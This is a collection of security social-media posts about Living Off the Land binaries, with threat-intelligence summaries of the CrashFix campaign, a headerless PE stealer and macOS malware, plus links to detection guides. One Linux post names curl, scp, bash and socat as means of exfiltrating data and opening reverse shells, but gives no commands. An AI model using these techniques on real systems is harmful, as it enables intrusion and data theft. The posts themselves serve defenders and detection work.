CrashFix marks a notable escalation in ClickFix tradecraft.

The campaign combines browser DoS, fake Chrome extensions, delayed execution, LOLBin abuse (finger.exe → ct.exe), and a portable Python environment to deploy a covert RAT only after identifying high-value systems.

This is a strong case for:
• Behavior-based detection
• EDR in block mode
• Restricting legacy utilities
• User-focused threat modeling

💬 Which detection layer would catch this earliest in your environment?

Source: https://www.microsoft.com/en-us/security/blog/2026/02/05/clickfix-variant-crashfix-deploying-python-rat-trojan/

🔔 Follow @technadu for deep technical threat analysis

#InfoSec #CrashFix #ClickFix #PythonMalware #LOLBins #EDR #ThreatHunting #DetectionEngineering #MicrosoftDefender #TechNadu

No PE header? No problem.

@FortiGuardLabs dropped a deep dive into a malware sample dumped without a PE header — like a cybercriminal rage-quit halfway through packing their payload.

You ever load a binary in IDA and think, “Am I being punk’d?”
Yeah, it’s one of those samples.

This sample:

• Reconstructs its own PE structure at runtime

• Hides config data in obfuscated blobs

• Uses anti-sandbox tricks to avoid analysis

• Drops yet another info-stealer, because originality is dead

It’s engineered to break basic static analysis and dodge sandboxes like it’s speedrunning DEFCON CTF.

🔗 Full breakdown:
https://www.fortinet.com/blog/threat-research/deep-dive-into-a-dumped-malware-without-a-pe-header

TL;DR for blue teamers:

• Static AV signatures won’t help here

• Watch for suspicious memory allocations + hollowing patterns

• Endpoint heuristics > file-based detection

• Log your PowerShell and LOLBins — this thing probably brings friends

• If your EDR cries when it sees raw shellcode, maybe give it a hug

#ThreatIntel #MalwareAnalysis #ReverseEngineering #Infosec #PEFilesAreSo2020 #EDREvasion #LOLbins #CyberSecurity #BlueTeam

On Linux systems, some of the most dangerous hacking tools are already preinstalled. Bash, curl, netcat, awk, even less — these common binaries can be chained together for stealthy attacks. They are called Linux LOLBins, short for Living Off the Land Binaries. Rather than dropping new malware, an attacker can leverage what is already there to stay undetected. Need to exfiltrate data? Use curl or scp. Want a reverse shell? Try bash or socat. Fileless persistence, privilege escalation, lateral movement — it can all happen through trusted tools.

Security is not just about locking the doors. It is about knowing which ones are left wide open by default.

#LinuxSecurity #LOLBins #LivingOffTheLand #RedTeamTips #CommandLineWarfare

They don’t need malware. They weaponize what’s already trusted - PowerShell, WMI, CertUtil. This is Living Off the Land. Defend or be devoured.
#LOLBins #infosec #cybersecurity #redteam #ethicalhacking #windowssecurity #postexploitation #DeadSwitch

http://tomsitcafe.com/2025/05/06/living-off-the-land-how-hackers-use-your-tools-against-you/

Was looking for a good Awesome list on Living Off the Land ( #LOL #LOtL ) tools/techniques. Found some helpful sites / repos but either nothing I could contribute to or it was limited.

So... I made one: https://github.com/danzek/awesome-lol-commonly-abused

Contributions welcome, whether by replying to this post or sending a PR on GitHub.

#lolbins #lolbas

#Hackers are abusing #Microsoft tools more than ever before

Abuse of #LOLbins in #cyberattacks is skyrocketing, Sophos says

https://www.techradar.com/pro/security/hackers-are-abusing-microsoft-tools-more-than-ever-before

an awesome overview of all the LOL and GTFO stuff. Even some are well known it's a good overview.

https://github.com/sheimo/awesome-lolbins-and-beyond

#redteam #lolbin #gtfo #securityressource #lolbins #blueteam #detectionengineering

Detecting Malicious Use of LOLBins: https://www.huntress.com/blog/detecting-malicious-use-of-lolbins

#lolbins #threathunting #threatdetection

Did you know that the finger command can be used for data exfil? We recently had an incident where this type of activity was found

https://www.huntress.com/blog/cant-touch-this-data-exfiltration-via-finger

#DFIR #lolbins #lolbas #exfil #mchammer #CTI #cybersecurity
@keydet89

"🍎 macOS Malware 2023: Navigating the New Threat Landscape 🌐"

Apple's XProtect recently updated to version 2173, introducing rules for Atomic Stealer and Adload. However, 2023 has unveiled novel methods to compromise Macs, leaving users vulnerable unless additional protective measures are taken. Key insights:

While Apple is enhancing its malware detection capabilities, third-party solutions are still crucial for comprehensive protection against both common and advanced threats. SentinelOne offers a robust platform for macOS threat detection and remediation. 🛡️💻

Source: SentinelOne

Tags: #macOS #Malware #CyberSecurity #XProtect #Infostealers #SocialEngineering #OffensiveSecurity #LOLBins #OpenSource #SentinelOne 🌍🔒🖥️